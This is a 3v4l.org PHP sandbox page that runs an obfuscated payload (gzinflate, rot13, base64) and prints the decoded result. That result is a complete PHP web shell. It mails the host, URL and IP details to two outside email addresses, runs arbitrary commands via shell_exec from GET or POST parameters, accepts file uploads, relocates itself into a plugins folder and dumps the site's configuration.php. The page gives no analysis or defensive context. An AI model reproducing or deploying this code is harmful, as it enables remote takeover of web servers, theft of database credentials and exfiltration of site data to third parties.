3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php echo gzinflate(str_rot13(base64_decode('5Ul6QuNTEP5cpPsPyzaSHR3E0KrSCTCCgilEC6Fk0i+ArI09VvZv703rNSFS/PfOru28HAflqvvWKEXsbH3m2ZnZgEVFUgplqTQXE2qvffhui4+Ju82LArTbisIgDLu961t0xD6zmWbfYf/w9G6r9cALrnBMClp8sodBrTmM8NE49P8K+rf0ZTC4iS574YDeGzUXnzfU/eDPbhAOom6/WxmMcbJACzpgdwKaJFxQSc6YIGrCxDYBqLEr2BiyvQTQ9oQLHqGx6xhulMkEnHIBWMM2bHcVEJeK6wXGD0Ivguiqah5ggN7FBT18/rAFdgFiS12jkVoNKgflcMapLPR1IUsG7rIkp/qNQc/P+8hGXTTMtEcY5DWnfmPVGwR4QRnjqVjHCkCAnlg1m3LxycRVO7HM6A6hliq6UC9MwUbyqzkXpHaqaH7gbA1KyE1Gzp3o3pAQ1AMYIGgVaoKgtIsAcASI4gYrXYFgb6L4daFrMgKmkpMFm1f5v1DxZQbQZh8Vq8ZsbvHxo+0YPmmbOfotGNw6ZCoFmBkyI0fIRcWwPhRBa9bv3gyii+4fwfXpSODYwVWg0Jz4K6vz3tnwKrgeUf1eYuDcaqiXp+WEi8IrsR4PHvNHKujk09wMjIKq46pnO6SK167wf8d2OmvXNB1H04RT8UcSbaS5QeFrKH4XZS7ILglslqdAwimk6ZFKdo9T6thHRbuMJS6dgv8N/kIklkuq/+Mn+07DcNpM5u3QI2K0Z2GhMDL8+NSlHSwzTwFlo63Qemp1+705huiAhZQ88XqkeYGPGG6ZolDJcaWcfKlch/WufOYAMSE1VBqV9jjbm27GpYg1l4LkZllTWXvF86RNO7ERSM3YKv1PK5XLwjX6HcdmeS9N1bbRpSCsqr27YhQKZ6kEMZIOGjen+7Qmt41ey7+W4u7uW2Wg9etW6lGGMgcpRhnJzElSpmLMPVCY5cCn9Ph6T89xljGRNAQeZJGXmuhSDj7V8KgpMRz7NM4SuqkNy0TGSvoqDiUPLC3t+wztPYPs2DncUQprQDZRSaaa51l2eLebMM0a5Fo5ppp/KW6IM84SZcFGsHJrxvpSNUaeJCB3tFKFfcNgjP612vSmbKVozkJItDdEXMPcbR+QaBB48Q2blff+L2geAWbzQFacsqLwNdtjqEDWOjrSWGGrgjfoXduuhrFbp2Vh9nh2PRJhFn2+moHtlsXR+NRj0OnJKuw+Ngs4vGgaV5x7tLNTtg8z+QBEFR2SyBi4X2jRTB5IYbhol3U6NloN5ruEMtVJe6TpCrw3ITF74ZlHy5h56MMyjqEoiFNE58tjuLwq/Tahh+TZjtwLpuvOYqjGTrG81cossTdKvdtlBet69GbTU3v2gxu7MMs+glSIXRPJrraqkzzjWDf2y+Z9mq0gyBrDV/FfIcg3MSzJ/KaoQU2Q3ZQ5rwR++UpuxG+2qlqMsTbTDJG9udAfYq4CL7KOh1+j55NFMbNR7L3fYXe3vibHPw==')));
based on GtRej
Output for 4.3.0 - 7.1.0
error_reporting(0); if (!isset($_SESSION['bajak'])) { $visitcount = 0; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Target ditemukan \n$web$inj"; $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE = OFF";} else {$security= "SAFE_MODE = ON";}; $serper=gethostbyname($_SERVER['SERVER_ADDR']); $injektor = gethostbyname($_SERVER['REMOTE_ADDR']); mail("freenetworkkmc@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); mail("angribyridbeard@yahoo.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); mail("angribyridbeard@yahoo.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); $_SESSION['bajak'] = 1; } else {$_SESSION['bajak']++;}; if(isset($_GET['clone'])){ $source = $_SERVER['SCRIPT_FILENAME']; $desti =$_SERVER['DOCUMENT_ROOT']."/plugins/user/explore.php"; rename($source, $desti); } $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE : OFF";} else {$security= "SAFE_MODE : ON";} echo "<title>UnKnown - Simple Shell</title><br>"; echo "<font size=2 color=#888888><b>".$security."</b><br>"; $cur_user="(".get_current_user().")"; echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>"; echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>"; function pwd() { $cwd = getcwd(); if($u=strrpos($cwd,'/')){ if($u!=strlen($cwd)-1){ return $cwd.'/';} else{return $cwd;}; } elseif($u=strrpos($cwd,'\\')){ if($u!=strlen($cwd)-1){ return $cwd.'\\';} else{return $cwd;}; }; } echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>'; echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>'; if(isset($_POST['submit'])){ $uploaddir = pwd(); if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){ echo "Upload Failed"; } else { echo "Upload Success to ".$uploaddir.$name." Succes! "; } } if(isset($_POST['command'])){ $cmd = $_POST['cmd']; echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>"; } elseif(isset($_GET['cmd'])){ $comd = $_GET['cmd']; echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>"; } else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>"; } if(isset($_GET['baca'])){ $conf = file_get_contents("../../configuration.php"); echo $conf; }